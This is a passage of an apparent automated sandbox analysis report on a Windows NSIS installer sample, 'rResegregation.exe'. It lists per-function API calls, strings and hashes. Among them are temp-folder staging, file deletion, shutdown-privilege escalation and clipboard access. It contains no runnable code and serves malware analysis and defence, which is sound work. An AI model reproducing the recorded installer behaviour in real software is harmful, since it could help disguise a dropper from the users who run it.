calls 5337->5340 5338 4041cb 5339 40429f 5338->5339 5341 4041d5 GetDlgItem 5338->5341 5347 403f58 8 API calls 5339->5347 5343 4040a6 5340->5343 5344 4041eb 5341->5344 5345 40425d 5341->5345 5342->5338 5342->5339 5346 4041a0 GetDlgItem SendMessageA 5342->5346 5348 403ef1 19 API calls 5343->5348 5344->5345 5352 404211 6 API calls 5344->5352 5345->5339 5349 40426f 5345->5349 5367 403f13 KiUserCallbackDispatcher 5346->5367 5357 40429a 5347->5357 5351 4040b3 CheckDlgButton 5348->5351 5353 404275 SendMessageA 5349->5353 5354 404286 5349->5354 5365 403f13 KiUserCallbackDispatcher 5351->5365 5352->5345 5353->5354 5354->5357 5358 40428c SendMessageA 5354->5358 5355 4041c6 5359 4042c4 SendMessageA 5355->5359 5358->5357 5359->5338 5360 4040d1 GetDlgItem 5366 403f26 SendMessageA 5360->5366 5362 4040e7 SendMessageA 5363 404105 GetSysColor 5362->5363 5364 40410e SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5362->5364 5363->5364 5364->5357 5365->5360 5366->5362 5367->5355 4726 40173e 4727 402a3a 18 API calls 4726->4727 4728 401745 4727->4728 4729 4059ae 2 API calls 4728->4729 4730 40174c 4729->4730 4731 4059ae 2 API calls 4730->4731 4731->4730 5368 401ebe 5369 402a3a 18 API calls 5368->5369 5370 401ec5 5369->5370 5371 406010 2 API calls 5370->5371 5372 401ecb 5371->5372 5374 401edd 5372->5374 5375 405c6a wsprintfA 5372->5375 5375->5374 5376 40193f 5377 402a3a 18 API calls 5376->5377 5378 401946 lstrlenA 5377->5378 5379 402513 5378->5379

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • SetErrorMode.KERNELBASE ref: 00403111
                                                                  • GetVersion.KERNEL32 ref: 00403117
                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403140
                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403162
                                                                  • OleInitialize.OLE32(00000000), ref: 00403169
                                                                  • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403185
                                                                  • GetCommandLineA.KERNEL32(Bortdmmer Setup,NSIS Error), ref: 0040319A
                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\rResegregation.exe",00000000), ref: 004031AD
                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\rResegregation.exe",00000020), ref: 004031D8
                                                                  • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032D5
                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032E6
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032F2
                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403306
                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040330E
                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040331F
                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403327
                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040333B
                                                                    • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                    • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                  • OleUninitialize.OLE32(?), ref: 004033E9
                                                                  • ExitProcess.KERNEL32 ref: 0040340A
                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403527
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040352E
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403546
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403565
                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 00403589
                                                                  • ExitProcess.KERNEL32 ref: 004035AC
                                                                    • Part of subcall function 00405502: MessageBoxIndirectA.USER32(00409218), ref: 0040555D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                  • String ID: "$"C:\Users\user\Desktop\rResegregation.exe"$.tmp$1033$Bortdmmer Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre$C:\Users\user\Desktop$C:\Users\user\Desktop\rResegregation.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`KIv$~nsu
                                                                  • API String ID: 3329125770-3388394840
                                                                  • Opcode ID: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
                                                                  • Instruction ID: 9f005f8ea334ebed05284af4b2fd35d6cfc3abe5f946e81cdcf7347df6e605c8
                                                                  • Opcode Fuzzy Hash: 6abb48eee298fabc64d5b75a2fcda338828ab476ca8097a17d05218fc85f4c00
                                                                  • Instruction Fuzzy Hash: 02C1D7705082816AE7116F75AD4DA2F7EACAF8634AF04457FF541B61E2CB7C4A048B2E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  [Control-flow graph starting at basic block 405063-40507f; nodes marked Executed / Not Executed; graph image not reproduced]
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000403), ref: 004050C2
                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004050D1
                                                                  • GetClientRect.USER32(?,?), ref: 0040510E
                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405115
                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405136
                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405147
                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 0040515A
                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405168
                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040517B
                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040519D
                                                                  • ShowWindow.USER32(?,00000008), ref: 004051B1
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004051D2
                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004051E2
                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004051FB
                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405207
                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004050E0
                                                                    • Part of subcall function 00403F26: SendMessageA.USER32(00000028,?,00000001,00403D57), ref: 00403F34
                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405223
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004FF7,00000000), ref: 00405231
                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405238
                                                                  • ShowWindow.USER32(00000000), ref: 0040525B
                                                                  • ShowWindow.USER32(?,00000008), ref: 00405262
                                                                  • ShowWindow.USER32(00000008), ref: 004052A8
                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052DC
                                                                  • CreatePopupMenu.USER32 ref: 004052ED
                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405302
                                                                  • GetWindowRect.USER32(?,000000FF), ref: 00405322
                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040533B
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405377
                                                                  • OpenClipboard.USER32(00000000), ref: 00405387
                                                                  • EmptyClipboard.USER32 ref: 0040538D
                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405396
                                                                  • GlobalLock.KERNEL32(00000000), ref: 004053A0
                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004053B4
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004053CD
                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004053D8
                                                                  • CloseClipboard.USER32 ref: 004053DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                  • String ID: @y
                                                                  • API String ID: 590372296-2793234042
                                                                  • Opcode ID: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
                                                                  • Instruction ID: 0ac8b7377d144d48f6dc293dc42051cc71820a332a9e268c47e7b227606d372d
                                                                  • Opcode Fuzzy Hash: a25ffd471f9c9911946ace575152b1356f6dbca2492df985bd5bd73bc0166ab8
                                                                  • Instruction Fuzzy Hash: 2CA15B70900248BFEB119FA0DD89EAE7F79FB08355F10406AFA05B61A0C7795E41DF69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  [Control-flow graph starting at basic block 405d2e-405d39; nodes marked Executed / Not Executed; graph image not reproduced]
                                                                  APIs
                                                                  • GetVersion.KERNEL32(00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000), ref: 00405DDF
                                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E5A
                                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E6D
                                                                  • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405EA9
                                                                  • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405EB7
                                                                  • CoTaskMemFree.OLE32(0078FCF8), ref: 00405EC2
                                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EE4
                                                                  • lstrlenA.KERNEL32(Call,00000006,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,00404F5D,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000), ref: 00405F36
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                  • API String ID: 900638850-3776482974
                                                                  • Opcode ID: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
                                                                  • Instruction ID: 9bfabfc36fba32fb106481ebf294e43342570200e8730ead7ab322b99494356e
                                                                  • Opcode Fuzzy Hash: 8e4aff95ddad0addc738e551539eceb0a07d965f5232f19123b82c8b3c8fb634
                                                                  • Instruction Fuzzy Hash: F7611231904A05ABEF115B24CC84BBF7BA8DB56314F10813BE555BA2D1D33D4A82DF9E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  [Control-flow graph starting at basic block 4055ae-4055d4; nodes marked Executed / Not Executed; graph image not reproduced]
                                                                  APIs
                                                                  • DeleteFileA.KERNELBASE(?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055D7
                                                                  • lstrcatA.KERNEL32(Mundstykket.min,\*.*,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040561F
                                                                  • lstrcatA.KERNEL32(?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405640
                                                                  • lstrlenA.KERNEL32(?,?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405646
                                                                  • FindFirstFileA.KERNELBASE(Mundstykket.min,?,?,?,00409014,?,Mundstykket.min,?,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405657
                                                                  • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405704
                                                                  • FindClose.KERNEL32(00000000), ref: 00405715
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$Mundstykket.min$\*.*
                                                                  • API String ID: 2035342205-2800903699
                                                                  • Opcode ID: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                  • Instruction ID: 15aabf9ae26d8a027305d4c4078bc37ad96aa8a5c182164a2950041f9cf2f42d
                                                                  • Opcode Fuzzy Hash: a8a4b792d9683b8994eb6cd94214ef05887bb3d9b353618b8ffd8ce1ac1b6fd8
                                                                  • Instruction Fuzzy Hash: C651DF30800A04BADB21AB618C45BBF7A78DF42355F54857BF449B61D2D73C4981EE6E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • FindFirstFileA.KERNELBASE(76483410,0079FD90,Mundstykket.min,004058AF,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\), ref: 0040601B
                                                                  • FindClose.KERNELBASE(00000000), ref: 00406027
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID: Mundstykket.min
                                                                  • API String ID: 2295610775-3661976162
                                                                  • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                  • Instruction ID: 592bcfe3733b0aa744bdfcff45d7cd7e76fdd068ce72c1f71716353b7d55c377
                                                                  • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                                  • Instruction Fuzzy Hash: 02D012319491305BC714977C7D4C84F7A6C9B193717114A32F46AF12E0C6749CA286E9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  [Control-flow graph starting at basic block 403a1e-403a30; nodes marked Executed / Not Executed; graph image not reproduced]
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5A
                                                                  • ShowWindow.USER32(?), ref: 00403A77
                                                                  • DestroyWindow.USER32 ref: 00403A8B
                                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AA7
                                                                  • GetDlgItem.USER32(?,?), ref: 00403AC8
                                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ADC
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403AE3
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403B91
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403B9B
                                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB5
                                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403C06
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403CAC
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403CCD
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CDF
                                                                  • EnableWindow.USER32(?,?), ref: 00403CFA
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D10
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403D17
                                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D2F
                                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D42
                                                                  • lstrlenA.KERNEL32(0079E540,?,0079E540,Bortdmmer Setup), ref: 00403D6B
                                                                  • SetWindowTextA.USER32(?,0079E540), ref: 00403D7A
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403EAE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID: @y$Bortdmmer Setup
                                                                  • API String ID: 3282139019-1671991744
                                                                  • Opcode ID: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
                                                                  • Instruction ID: 604a4885fc931abc1044a41a4cf0f2958d917e977c7d56f4e50accb35e18e33b
                                                                  • Opcode Fuzzy Hash: cc9d0d33d140f6c7f3dfcc1daafeed48d3c30ff6fb1dcf2fe60019aa41219e48
                                                                  • Instruction Fuzzy Hash: F1C1AE31904205ABEB216F61ED85E2B3EACEB4574AF00453EF501B11F1C739A942DB5E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                    • Part of subcall function 004060A5: GetModuleHandleA.KERNEL32(?,?,?,00403156,00000009), ref: 004060B7
                                                                    • Part of subcall function 004060A5: GetProcAddress.KERNEL32(00000000,?), ref: 004060D2
                                                                  • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,76483410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rResegregation.exe",00000000), ref: 00403707
                                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,76483410), ref: 0040377C
                                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 0040378F
                                                                  • GetFileAttributesA.KERNEL32(Call), ref: 0040379A
                                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet), ref: 004037E3
                                                                    • Part of subcall function 00405C6A: wsprintfA.USER32 ref: 00405C77
                                                                  • RegisterClassA.USER32(007A16E0), ref: 00403820
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403838
                                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040386D
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 004038A3
                                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 004038CF
                                                                  • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 004038DC
                                                                  • RegisterClassA.USER32(007A16E0), ref: 004038E5
                                                                  • DialogBoxParamA.USER32(?,00000000,00403A1E,00000000), ref: 00403904
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 1975747703-323482368
                                                                  • Opcode ID: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
                                                                  • Instruction ID: b6748c6733e3bb55aa357910a2c4fdec813f4d760fd6ac6bc3454eeade69f907
                                                                  • Opcode Fuzzy Hash: 5ab0478d8d29fcc30d6f86d58a97276ab6e1e5173614108ac56cb6ac56f41f24
                                                                  • Instruction Fuzzy Hash: D06106B4504244AEE710AF659C45F3B3AACEB85789F00857FF900B22E1D77CAD019B2D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rResegregation.exe,00000400), ref: 00402C93
                                                                    • Part of subcall function 0040597F: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00405983
                                                                    • Part of subcall function 0040597F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A5
                                                                  • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rResegregation.exe,C:\Users\user\Desktop\rResegregation.exe,80000000,00000003), ref: 00402CDF
                                                                  Strings
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                                  • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                                  • C:\Users\user\Desktop\rResegregation.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                                  • Error launching installer, xrefs: 00402CB6
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                                  • "C:\Users\user\Desktop\rResegregation.exe", xrefs: 00402C66
                                                                  • Null, xrefs: 00402D5D
                                                                  • soft, xrefs: 00402D54
                                                                  • Inst, xrefs: 00402D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rResegregation.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                  • API String ID: 4283519449-2449525394
                                                                  • Opcode ID: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
                                                                  • Instruction ID: fe9ef23653e85685a193ad9c5457c4b2e55d644b791d7b95544962d8ab1ad500
                                                                  • Opcode Fuzzy Hash: ade385f577374e8dc66d5b5cc495e95f7f1f773012bbca210bc499bf2ace4bcf
                                                                  • Instruction Fuzzy Hash: CC51F471941214AFEB119F65DE89B9E7BA8EF04364F14803BF904B62D1D7BC8D408BAD
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  APIs
                                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,00000031), ref: 00401790
                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre,00000000,00000000,00000031), ref: 004017BA
                                                                    • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Bortdmmer Setup,NSIS Error), ref: 00405D19
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000,?), ref: 00404F5E
                                                                    • Part of subcall function 00404F25: lstrlenA.KERNEL32(00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0,?,?,?,?,?,?,?,?,?,00402FD7,00000000), ref: 00404F6E
                                                                    • Part of subcall function 00404F25: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00402FD7,00402FD7,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,00000000,0078FCF8,764823A0), ref: 00404F81
                                                                    • Part of subcall function 00404F25: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll), ref: 00404F93
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FB9
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FD3
                                                                    • Part of subcall function 00404F25: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FE1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\brummedes\janthinidae\Uhyre$C:\Users\user\AppData\Local\Temp\nsoF4B.tmp$C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll$Call
                                                                  • API String ID: 1941528284-3702322575
                                                                  • Opcode ID: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
                                                                  • Instruction ID: e334bcbcf7859558867c6a38b10ffbeddee8f855bc543c6a7f27992f07fd6e89
                                                                  • Opcode Fuzzy Hash: 9b300b49a9657bfd428a479fc8852c58b384813346898322a4567d762304faaf
                                                                  • Instruction Fuzzy Hash: 4B41C672900519BADB107BA5CC45DAF7AB9DF46329B20C33BF021B20E1C67C4A419A5D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

